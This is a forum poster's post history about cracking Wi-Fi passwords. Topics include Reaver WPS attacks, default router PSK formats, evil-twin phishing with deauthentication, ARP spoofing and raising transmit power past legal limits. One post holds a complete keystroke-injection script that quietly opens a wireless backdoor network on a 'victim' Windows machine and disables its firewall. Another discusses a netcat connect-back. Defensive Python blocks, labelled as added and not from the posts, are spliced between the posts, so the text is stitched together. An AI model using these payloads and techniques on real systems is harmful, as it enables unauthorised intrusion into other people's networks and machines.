michael_kent123
Everything posted by michael_kent123

  1. There are tons of YouTube videos which show how it's possible to overcome the iPhone lock. Typically, however, one can only access e-mail or post to Twitter or see photos. I think the answer to my question is "no" but I'm wondering if there are any hacks that allow access to the "settings" menu once the lock has been bypassed? I'm referring to any kind of iPhone 5 or 6. Thanks.
  2. I downloaded Router Keygen onto my Android tablet. However, all networks were considered "unsupported". I am surrounded by BTHomeHubs, SKY, and TalkTalk. These may well be Broadcom which are not supported by Router Keygen which targets Thompson routers. What do you mean by "Europe"? For example, I am in the UK which is Europe. Do you mean continental Europe e.g. France, Spain, Italy, etc?
  3. Yes, I've noticed that often a MAC address will have some similarities to the BSSID. I didn't realise that it might be possible to compute the WPA password from the MAC or BSSID.
  4. Does anyone know what Router Keygen actually does: http://router-keygen.en.uptodown.com/ Apparently, "Router Keygen for Windows interface is very simple. In the main window you'll have three tabs separating all the WiFi networks that can be found in your vicinity: on one side the ones supported by Router Keygen, on another the ones probably not supported, and finally the ones that you're sure not to be able to decrypt." I don't understand what this means. The program is a nightmare to set up in Ubuntu so I don't want to spend any more time on it unless it's actually interesting. Perhaps someone can spell out to me what this program does.
  5. @IrishFavor Thanks for the suggestions. So, if I understand correctly:
a) root the Android tablet - http://www.cnet.com/how-to/how-to-easily-root-an-android-device/
b) install Linux Deploy - https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy&hl=en
c) install Kali image - http://www.kali.org/how-to/kali-linux-android-linux-deploy/
  6. Just wondering if anyone has anything to add on this topic?
  7. I recently used a Windows tool called Dumpper (correct spelling) which claims to know the default WPS pins for a variety of routers. See: http://sourceforge.net/projects/dumpper/ To say that it did not work is an understatement. I would think that if there were default WPS pins then there would be no need for a tool like Reaver. Does anyone know more about this? Do / did certain routers ever have default pins?
  8. I have a Sanei N77 tablet that runs Android OS. See: http://www.saneimall.com/ It has a mini USB. In Android, I can connect Kali Live USB to the mini USB cable. The OS recognizes the USB. Does anyone know if it is possible to boot into Kali (or, for that matter, into any live USB)? Since there is no keyboard, there is no opportunity to press F2 (as I do with my laptop) to enter the BIOS and change the boot order. Thanks.
  9. Is there anything else UK based that you recommend? I did go to a few 2600 London meetings but was not too impressed. It seemed to be people who just liked to drink. I also went to DEFCON 4420 in London but found it quite cliquey (lots of people who already knew each other).
  10. Thanks for your helpful and informative comments. So you are saying that most users these days use default passwords provided by the manufacturer - but that these are very hard to brute force because they are not based on any kind of dictionary words. Correct? If so, this will be an example where not changing the default password is best. When I looked at my friend's PlusNet wireless router, the default was a random 12 digit uppercase hex number e.g. "DD01FE17FAA5". He didn't change the default. I suppose it could be bruteforced but even commercial crackers like gpuhash.me charge 0.58 BTC and that's for 10 digit hex (uppercase or lowercase).
One thing I was wondering is whether there is a website that lists the default PSK style for all routers. gpuhash.me lists a few (https://gpuhash.me/?menu=en-tasks-add):
Often used as a default WPA password for broadband routers:
10 digits — 2WIRExxx, ONOxxxx, ATTxxx, BigPondxxx
8 lowercase — virginmedia
8 uppercase — SKYxxx, UPCxxxxxxx
10 HEX lowercase — BTHomeHub(1-4)-xxxx
There must be some standard for all routers. For example, even if all PlusNet routers are 12 hex uppercase, an adversary with significant GPU power (e.g. a government) could surely crack all default router passwords given time?
I agree. At the same time, however, it is worth noting that the Reaver forums are active (whether the Kali Linux forum or the Google Code page where Reaver is hosted). There is now a fork of Reaver (https://code.google.com/p/reaver-wps-fork/). I can't imagine it can be 100% dead - maybe 97%. But is it worth spending time on? Probably not.
My impression is that there are two options. You either provide the same SSID and hope that your Tx power is superior to the target's. Or you end up with two very similarly named systems and hope that the target chooses your open network as he is fed up with being unable to connect to his genuine WPA(2) system due to the ongoing deauth attack.
Once the target connects to you, PwnStar serves them a page which tells them there is a router error and asks them to input their WPA(2) PSK. This requires the user to a) manually connect to the attacker's open network; b) know their own PSK (which should be on the router but they may not know this); c) be willing to enter it. PwnStar then either provides internet access or does not provide internet access, in which case the webpage just goes into a loop back to the phishing page every time the user requests a website. The router phishing page is an addition to PwnStar (https://forums.kali.org/showthread.php?21114-New-WPA-Phishing-system-using-pwnstar9-0-released-for-general-use). Any more comments or suggestions?
  11. Thanks for posting these. Having visited Sheffield, I understand the "Steel" name. Since you are UK based, what other UK cons would you recommend?
  12. Oddly enough, I referenced that link in the third line of my post.
  13. Hello, I want to comment on how I understand WPA(2) cracking based on the situation today. In my opinion, there are three ways to target WPA(2). a) PSK dictionary cracking. b) WPS cracking. c) Social engineering.
a) My opinion is that PSK dictionary cracking is unlikely to work. As an experiment, I acquired the 4-way handshake of ten APs in the vicinity. I uploaded these to gpuhash.me. No PSKs were found. The site claims that they use a 337 million word dictionary. Moxie Marlinspike's cloudcracker.com uses a 604 million word dictionary but charges $17 per attempt whether successful or unsuccessful. gpuhash.me only charge if they are successful. My impression is that most people these days use non-dictionary passwords. Of note, most routers that I can see in my area have default SSIDs. For example, I observe various BTHomeHub2-XXXX, BTHub3-XXXX, and SKYXXXXX names. I am in the UK. The default SSIDs may suggest that the owners also use default passwords. According to gpuhash.me "Full range of 10 hexadecimal lowercase digits (0000000000-ffffffffff). Often used as a default WPA password for broadband routers: BTHomeHub(1-4)-xxxx." These attempts demand energy and hence are expensive. The lowercase 10 hex attack is 1100GB worth of keywords. gpuhash.me requests 0.58 BTC which is currently $176 or £111. And, of course, there is no guarantee that the default password has not been changed.
b) In my opinion, the main WPS cracking tool, Reaver, is effectively dead. First, the target router must be WPS enabled. Many are not. Checking the number of routers discovered by airodump-ng compared to those recorded by wash will indicate that about 50% of routers cannot be targeted by the WPS attack. Then, of those that can, the majority time out due to WPS locking. Even those that do not lock have other errors. They may get stuck at 90.90% or 99.99%. In these scenarios, Reaver does not discover the first four digits of the WPS PIN and goes into a loop.
I am currently playing with the Reaver fork, version 1.5, but am not optimistic that it will improve matters (based on users' comments) (https://code.google.com/p/reaver-wps-fork/). After all, the issue is not Reaver, but with how routers now function whether they are sold new or have had firmware updates. This is not to say that Reaver is always ineffective. As Digininja notes, an organisation with 100 APs might have one that is vulnerable (https://forums.hak5.org/index.php?/topic/33715-is-reaver-totally-dead/). However, if there is only one AP, the likelihood of success is minimal.
c) AIUI, the main tool is PwnStar (https://github.com/SilverFoxx/PwnSTAR). You create an open network (a softAP) with the same SSID as that of the network you are targeting. You deauth the client from the genuine AP using aireplay-ng. The user then attempts to reconnect to his network but accidentally connects to you because your SSID shows up in the network list and its Tx power is superior to that of the genuine router. This attack requires the user to manually connect to an open network rather than their real WPA(2) network. My impression is that the user has to manually connect because their real SSID uses WPA(2) and hence, after the deauth, their system will not automatically connect to an open network (even one that uses the same SSID). A variation, promoted by Musket Teams on the Kali Linux forums, is to use a very similar SSID. In other words, if the real SSID is "SKY12345" the softAP SSID would be "SKY12345 ." (five spaces then a dot). AIUI, the idea is that the target's system will start to send out probe requests to open networks to which it previously connected, and the attacker system claims it is one of these networks. (It's not therefore necessary for the SSID to be so similar but the Musket Teams idea looks good for social engineering purposes). However, my impression is that modern systems are less likely to automatically connect.
For example, if I deauth myself (on a different computer) from a Windows 8 system, it will not then connect to any open systems in the vicinity even if I had connected to them before. The only way is to manually connect. I would appreciate any comments on the above scenarios. Further, perhaps there are other WPA(2) attacks that can obtain the PSK of which I am unaware. Thanks!
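As an added example (not from these posts), the key-space arithmetic behind the default-PSK formats quoted in posts 10 and 13 above, i.e. how much guessing work each vendor convention represents. The format list is the one quoted from gpuhash.me, the 12-hex PlusNet entry is the poster's observation, and the guess rate is an assumed round number used only to make the figures concrete.

```python
"""Estimate the guessing work behind the default PSK formats quoted above.

Added example, not from the forum posts: the format list is the one quoted
from gpuhash.me in the posts, the 12-hex PlusNet entry comes from the
poster's observation, and the guess rate is an assumed round number used
only to make the arithmetic concrete.
"""
import math

CHARSET_SIZE = {"digit": 10, "hex": 16, "lower": 26, "upper": 26}

# (variable-symbol count, symbol class) for each default-password style.
# Case of hex does not matter to someone who knows the vendor's convention:
# 10 hex upper and 10 hex lower are the same size key space.
DEFAULT_FORMATS = {
    "2WIRE / ONO / ATT / BigPond (10 digits)": (10, "digit"),
    "virginmedia (8 lowercase)": (8, "lower"),
    "SKY / UPC (8 uppercase)": (8, "upper"),
    "BTHomeHub(1-4) (10 hex lowercase)": (10, "hex"),
    "PlusNet as observed (12 hex uppercase, assumed random)": (12, "hex"),
}

def keyspace(length, charset):
    """Number of candidate PSKs: charset size to the power of the length."""
    return CHARSET_SIZE[charset] ** length

def entropy_bits(length, charset):
    """Strength in bits, i.e. log2 of the key space."""
    return length * math.log2(CHARSET_SIZE[charset])

def expected_seconds(length, charset, guesses_per_second):
    """Expected search time: on average half the key space is tried."""
    return keyspace(length, charset) / 2 / guesses_per_second

def report(guesses_per_second=1_000_000):
    """Rows of (format, bits, expected days) at the given guess rate.
    1e6 WPA2 guesses/s is an assumption standing in for a GPU cluster."""
    rows = []
    for name, (length, charset) in DEFAULT_FORMATS.items():
        days = expected_seconds(length, charset, guesses_per_second) / 86400
        rows.append((name, round(entropy_bits(length, charset), 1), days))
    return rows

if __name__ == "__main__":
    for name, bits, days in report():
        print(f"{name:55s} {bits:5.1f} bits  ~{days:10.1f} days")
```

The point for a defender is the gap between the rows: a 10-digit default is a matter of hours at the assumed rate, while a random 12-hex key is years, so whether a default should be changed depends on the vendor's format, not on "default" as such.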
  14. What do these tools do that Reaver cannot do?
  15. Hello, I am able to boot into the live version of Kali but cannot achieve persistence. I follow http://docs.kali.org/installation/ka...sb-persistence changing where necessary (the .iso and location of my usb). In Ubuntu 12.04, I run:
dd if=kali-linux-1.0.9-i386.iso of=/dev/sdc bs=1M
My USB is on /dev/sdc. I then can boot into Kali with no problems at start-up. However, I then enter Ubuntu and run as root (after su):
size=5gb
read bytes _ < <(du -bcm /home/name/kali-linux-1.0.9-i386.iso |tail -1); echo $bytes
parted /dev/sdc mkpart primary $bytes $size
mkfs.ext3 -L persistence /dev/sdc1
e2label /dev/sdc1 persistence
mkdir -p /mnt/my_usb
mount /dev/sdc1 /mnt/my_usb
echo "/ union" > /mnt/my_usb/persistence.conf
umount /dev/sdc1
I then try to run Kali from boot and am informed that it "failed to load ldlinux.c32". There are three directories on my USB: EFI, install, and live. I added ldlinux.c32 from http://rufus.akeo.ie/downloads/ to EFI/BOOT but still received the same error. df after I've tried to add persistence shows:
/dev/sdc2 61682 58670 3012 96% /media/Kali Live
I am obviously doing something wrong. What? Many thanks!
  16. I have experimented with Reaver over the past few days. In my opinion, this tool is dead. The first reason is that only a percentage of routers can be WPS attacked. Compare the outputs from airodump-ng and wash. There might be 20 WPA networks shown in airodump-ng but only 8 will be WPS crackable as shown by wash. The second reason is that all (?) routers now have WPS locking. I have spent considerable time with Reaver's various options such as -E (eap-terminate), -L (ignore WPS locks), -t (timeout period), -A (no associate; do so via aireplay-ng), and -d (set delays between pin attempts). Without fail, I always get either:
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking [or any other length I set]
WPS transaction failed (code: 0x02), re-trying last pin
I have tried the ReVdK3-r1.sh script. This did not work as it prevented Reaver from associating with APs. I also tried running mdk3 manually with Reaver on. Again, same problem: no association. I have used mdk3 in the past to unlock a locked router. However, once I tried Reaver again, after a few attempts the router just locked itself as before. The issue is how to prevent locking in the first place. My impression is that there is no way to avoid this. If the router is designed to lock, it will lock. So, I ask the simple question. Is Reaver 100% dead? If not, is there any viable way to use it? Can anyone paste options that have been shown to work recently? Thanks.
  17. Is your IP address on the same network in the VM as that of your Macbook (which is presumably connected to your router)? In other words: did you use bridged mode or NAT mode in the VM? Also, I don't see why you are using 3) and 4). Try: arpspoof -i interface gateway_IP (this should intercept all IP addresses that send traffic to the router).
  18. I don't understand your problem. If you set the --bssid then of course you will only see client(s) of that particular AP. If the client is unassociated, then this is because it is searching for an AP. See: http://www.aircrack-ng.org/doku.php?id=airodump-ng
  19. I have a question about the txpower of wireless cards. In this case, I am using the Alfa AWUS036H on wlan1. I use the iw reg set BO command to tell my system that I'm in Bolivia. This allows me to use iwconfig wlan1 txpower 30. Previously I could use a maximum txpower of 20. My question is: how is this useful? From what I've read, if I create a soft AP with airbase-ng, then a higher txpower makes my transmissions more likely to override those of the genuine AP. When else is a higher txpower helpful? Does it work with ARP spoofing? If I am sending out packets saying "192.168.1.1 (the router) is located at MAC 11:22:33:44:55:66", is it beneficial to have a higher txpower? Are there any other situations when a higher txpower is beneficial?
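The defender's side of the ARP-spoofing scenario in posts 17 and 19, as an added example that is not from these posts: a small monitor that learns the first IP-to-MAC binding seen in ARP replies and alerts when a later reply contradicts it, or when one MAC starts answering for several IPs. The gateway 192.168.1.1 and the MAC 11:22:33:44:55:66 are the values quoted above; the record format, timestamps and other addresses are constructed.

```python
"""Detect ARP-cache poisoning from a stream of ARP replies.

Added example, not from the forum posts: the gateway 192.168.1.1 and the
claimed MAC 11:22:33:44:55:66 are the values from the post; the record
format, the other addresses and the timestamps are constructed.
"""
from collections import defaultdict

def parse_arp_record(line):
    """Parse a constructed 'ts op sender_ip sender_mac' text record."""
    ts, op, ip, mac = line.split()
    return float(ts), op, ip, mac.lower()

class ArpMonitor:
    """Tracks the first IP->MAC binding seen (or a pinned gateway MAC) and
    alerts when a later reply contradicts it, and when one MAC starts
    claiming several IPs (typical of a spoofer relaying both directions).
    A legitimate MAC change (e.g. a replaced router) also alerts; the
    alert is a signal to investigate, not proof of an attack."""

    def __init__(self, gateway_ip, pinned_gateway_mac=None):
        self.gateway_ip = gateway_ip
        self.table = {}                  # ip -> mac
        self.claims = defaultdict(set)   # mac -> ips it has answered for
        self.alerts = []
        if pinned_gateway_mac:
            self.table[gateway_ip] = pinned_gateway_mac.lower()

    def feed(self, line):
        ts, op, ip, mac = parse_arp_record(line)
        if op != "reply":                # only replies update caches here
            return
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac
        elif known != mac:
            kind = "gateway-mac-changed" if ip == self.gateway_ip else "ip-mac-changed"
            self.alerts.append((ts, kind, ip, known, mac))
        before = len(self.claims[mac])
        self.claims[mac].add(ip)
        if len(self.claims[mac]) > max(before, 1):   # alert once per new IP
            self.alerts.append((ts, "mac-claims-multiple-ips", mac, sorted(self.claims[mac])))

SAMPLE_REPLIES = [  # constructed records
    "1.0 reply 192.168.1.1 aa:bb:cc:dd:ee:01",    # genuine gateway answers
    "2.0 reply 192.168.1.20 aa:bb:cc:dd:ee:20",   # a normal host answers
    "3.0 reply 192.168.1.1 11:22:33:44:55:66",    # gateway now 'at' another MAC
    "4.0 reply 192.168.1.20 11:22:33:44:55:66",   # same MAC also claims the host
    "5.0 request 192.168.1.30 aa:bb:cc:dd:ee:30", # requests are ignored
]

def run_sample():
    """Feed the constructed records and return the monitor with its alerts."""
    mon = ArpMonitor("192.168.1.1")
    for rec in SAMPLE_REPLIES:
        mon.feed(rec)
    return mon

if __name__ == "__main__":
    for alert in run_sample().alerts:
        print(alert)
```

On a real host the same logic can be driven from the kernel's ARP table (for example by polling the neighbour cache) rather than from text records; pinning the gateway MAC in the constructor is the equivalent of a static ARP entry.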
  20. I suspect that the majority of people who use webmail use Gmail, Yahoo, Hotmail / Outlook, or AOL. However, there are hundreds of other services out there. I don't mean niche services that cater for privacy-minded people but inferior versions of Gmail. Here is one example: http://www.lpemail.com/ And another: http://registration.myway.com/primary_login.jsp?regarea=email&return_url=http://my.myway.com/email_redir.jsp Here are my questions: 1. How do such services make money for their owners? They cannot have that many users. Who wants to sign up for a service with 125MB of space (like Myway)? Will they really make enough cash from advertising? 2. How easy would it be to set up a webmail provider in which each account had 1GB of space? In other words: a poor man's Gmail. What would one have to do? How much would it cost (highly speculative question!)?
  21. Perhaps I am missing something obvious. I run the script on the target. This creates the new wireless network. On my machine, I disconnect from whatever network I am connected to. I then connect to the new wireless network created on the victim machine. Is this correct? Thanks.
  22. Just to expand on the above. I have used the ducky code successfully on one Windows 8 machine. The script creates a network which I connect to (with a Blackberry) and receive a 192.168.x.x address. However, on another Windows 8 machine, the script also creates the network. Yet, whenever I try to connect to the network from my Ubuntu machine, I can never obtain a connection. I also try via the Blackberry but it also will not connect. It just times out / deauthenticates itself. When the script runs on the second Windows machine, all looks fine. I see the commands being run and accepted in the Windows terminal. Does anyone have any ideas? Why would it work on one Windows but not on the other?
  23. Hello, I have a problem with the following ducky script.
DELAY 3000
GUI r
DELAY 2000
STRING powershell Start-Process cmd -Verb runAs
DELAY 1000
ENTER
DELAY 10000
LEFTARROW
ENTER
DELAY 2000
STRING netsh wlan set hostednetwork mode=allow ssid=network key=whatever
ENTER
DELAY 2000
STRING netsh wlan start hostednetwork
ENTER
DELAY 2000
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING exit
ENTER
I do what Darren does in "What's Up With the Duck?": The duck script seems to work on the target machine. The network 'network' is created. However, when I connect to 'network' from my machine and enter the password, the connection always times out. This is what a successful connection from me to my AP looks like:
[68488.324824] wlan0: authenticate with b1:cd:00:12:a7:88
[68488.332390] wlan0: send auth to b1:cd:00:12:a7:88 (try 1/3)
[68488.334924] wlan0: authenticated
[68488.338097] wlan0: associate with b1:cd:00:12:a7:88 (try 1/3)
[68488.341976] wlan0: RX AssocResp from b1:cd:00:12:a7:88 (capab=0x411 status=0 aid=2)
[68488.352677] wlan0: associated
[68488.352980] cfg80211: Calling CRDA for country: AL
[68488.362972] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)
[68488.362978] cfg80211: Regulatory domain changed to country: AL
[68488.362979] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[68488.362981] cfg80211: (2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm)
[...]
I disconnect deliberately:
[68529.914912] wlan0: deauthenticating from b1:cd:00:12:a7:88 by local choice (reason=3)
[68529.970614] cfg80211: All devices are disconnected, going to restore regulatory settings
[68529.970621] cfg80211: Restoring regulatory settings
Here is what happens when I connect to 'network'.
[69302.952696] wlan0: authenticate with 21:32:12:7a:40:42
[69302.968746] wlan0: send auth to 21:32:12:7a:40:42 (try 1/3)
[69302.970611] wlan0: authenticated
[69302.971105] wlan0: associate with 21:32:12:7a:40:42 (try 1/3)
[69302.981330] wlan0: RX AssocResp from 21:32:12:7a:40:42 (capab=0x431 status=0 aid=1)
[69302.992791] wlan0: associated
[69302.993017] cfg80211: Calling CRDA for country: AL
[69302.999402] cfg80211: Updating information on frequency 2412 MHz for a 20 MHz width channel with regulatory rule:
[69302.999408] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)
[...]
I am deauthenticated involuntarily:
[69348.297397] wlan0: deauthenticating from 21:32:12:7a:40:42 by local choice (reason=3)
[69348.373035] cfg80211: All devices are disconnected, going to restore regulatory settings
[69348.373042] cfg80211: Restoring regulatory settings
I don't see any difference between a successful connection to my AP and an unsuccessful connection to the target machine. The target is a Windows 8 box. Does anyone know why I cannot connect to 'network'? Thanks!
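From the defender's side, an added example (not from this post) that flags the commands of the script above, i.e. a hosted network being configured and started and the firewall being switched off, in process-creation log lines. The simplified log format (timestamp, user, parent, command line) and the sample values are constructed; on a real host the same command lines appear in Sysmon Event ID 1 or Security Event 4688 with command-line auditing enabled.

```python
"""Flag process-creation log lines that match the rogue-AP ducky payload.

Added example, not from the forum post: the input lines are constructed in
a simplified 'ts user= parent= cmd=' form standing in for Sysmon Event ID 1
or Security 4688 records; field names and sample values are assumptions.
"""
import re

# Each rule is (label, pattern over the command line). The patterns mirror
# the commands in the ducky script above; the second firewall alternative
# is the newer netsh advfirewall form of the same action.
RULES = [
    ("hostednetwork-configured",
     re.compile(r"\bnetsh\s+wlan\s+set\s+hostednetwork\b.*\bmode=allow\b", re.I)),
    ("hostednetwork-started",
     re.compile(r"\bnetsh\s+wlan\s+start\s+hostednetwork\b", re.I)),
    ("firewall-disabled",
     re.compile(r"\bnetsh\s+(firewall\s+set\s+opmode\s+disable"
                r"|advfirewall\s+set\s+\w+\s+state\s+off)\b", re.I)),
    ("elevation-via-powershell",
     re.compile(r"\bStart-Process\b.*-Verb\s+runAs\b", re.I)),
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$")

def scan(lines):
    """Return (timestamp, label, command line) for every rule that matches."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                       # skip lines not in the expected form
        for label, rx in RULES:
            if rx.search(m["cmd"]):
                hits.append((m["ts"], label, m["cmd"]))
    return hits

def rogue_ap_chain(hits):
    """True when configure -> start -> firewall-off all appear; one of them
    alone may be legitimate (hosted networks have benign uses)."""
    labels = {h[1] for h in hits}
    return {"hostednetwork-configured", "hostednetwork-started",
            "firewall-disabled"} <= labels

SAMPLE_LOG = [  # constructed records
    "2015-01-10T12:00:01Z user=LAPTOP\\alice parent=explorer.exe cmd=powershell Start-Process cmd -Verb runAs",
    "2015-01-10T12:00:12Z user=LAPTOP\\alice parent=cmd.exe cmd=netsh wlan set hostednetwork mode=allow ssid=network key=whatever",
    "2015-01-10T12:00:14Z user=LAPTOP\\alice parent=cmd.exe cmd=netsh wlan start hostednetwork",
    "2015-01-10T12:00:16Z user=LAPTOP\\alice parent=cmd.exe cmd=netsh firewall set opmode disable",
    "2015-01-10T12:05:00Z user=LAPTOP\\alice parent=explorer.exe cmd=netsh wlan show interfaces",
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ts, label, cmd in found:
        print(f"{ts} {label:26s} {cmd}")
    print("rogue AP chain:", rogue_ap_chain(found))
```

The four commands arrive within seconds of one another with cmd.exe as parent, which is the timing signature of a keystroke-injection device rather than a person typing.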
  24. Hello, in 15.01 - "What's up with the Duck?" - Darren runs the ducky script which loads netcat on a victim's Windows machine and makes a connection to his netcat listener on his Ubuntu box. I've uploaded a screenshot of Darren's screen here: http://bayimg.com/bANKBaAfn I'm unclear about three aspects. 1. Darren's IP is 173.214.161.228. (ssh dk@173.214.161.228). However, http://173.214.161.228 provides a website for Dreamstreet Home Loans in Australia. Why is this? I assume that Darren has rented space on this VPS along with any number of other organisations / firms? 2. Darren runs netcat from dk@vps. I think that he is running the netcat from the VPS rather than from his own system? Is it normal to have netcat set up on a VPS? 3. Netcat is listening on 0.0.0.0:8002. What does 0.0.0.0 mean in this context? It's something to do with "all interfaces" but please explain in a simple fashion! What I mean is: is Netcat listening on the VPS or on Darren's system or on both? Thanks!
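On the 0.0.0.0 question, an added example that is not from the post or the episode: it binds a throwaway TCP listener first to 0.0.0.0 and then to 127.0.0.1 and checks which local addresses reach it. A listener bound to 0.0.0.0 accepts on every address the machine has (so it is reachable from the network, which is why exposed listeners matter); one bound to 127.0.0.1 accepts only on that address. Port 8002 and the VPS address from the post are not used; the port is chosen by the OS.

```python
"""Show what a listener bound to 0.0.0.0 accepts compared with 127.0.0.1.

Added example, not from the forum post or the episode it discusses: it
opens a throwaway TCP listener on an OS-chosen port (port 8002 from the
post is not used) and tests which local destination addresses reach it.
"""
import socket
import threading

def accepts(bind_ip, connect_ip, timeout=1.0):
    """Bind a listener to bind_ip on an ephemeral port, then try to connect
    to connect_ip on that same port. True if the connection was accepted."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_ip, 0))             # port 0: the kernel picks a free port
    port = srv.getsockname()[1]
    srv.listen(1)
    srv.settimeout(timeout)

    accepted = []
    def serve():
        try:
            conn, _ = srv.accept()
            accepted.append(True)
            conn.close()
        except socket.timeout:
            pass                       # nothing arrived: the bind excluded it
    t = threading.Thread(target=serve)
    t.start()

    cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    cli.settimeout(timeout)
    try:
        cli.connect((connect_ip, port))
        ok = True
    except OSError:                    # connection refused or timed out
        ok = False
    finally:
        cli.close()
    t.join()
    srv.close()
    return ok and bool(accepted)

if __name__ == "__main__":
    # 0.0.0.0 is the IPv4 wildcard: "every address this host has". On Linux
    # all of 127/8 is on the loopback interface, so 127.0.0.2 is a second
    # local address that a 127.0.0.1-bound listener will refuse; on other
    # systems 127.0.0.2 may not exist, so it is only demonstrated here.
    for bind_ip in ("0.0.0.0", "127.0.0.1"):
        for dst in ("127.0.0.1", "127.0.0.2"):
            print(f"listener on {bind_ip:9s} reached via {dst:9s}: "
                  f"{accepts(bind_ip, dst)}")
```

Applied to the post: 0.0.0.0:8002 says the listener accepts on every address of whichever machine ran netcat, so a listener that must be reachable from the internet is bound there on the host with the public address, not on both machines.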
  25. I suppose the idea is that - considering the computer is in use - it would be being used by an "admin" member (i.e. the person who owns the laptop).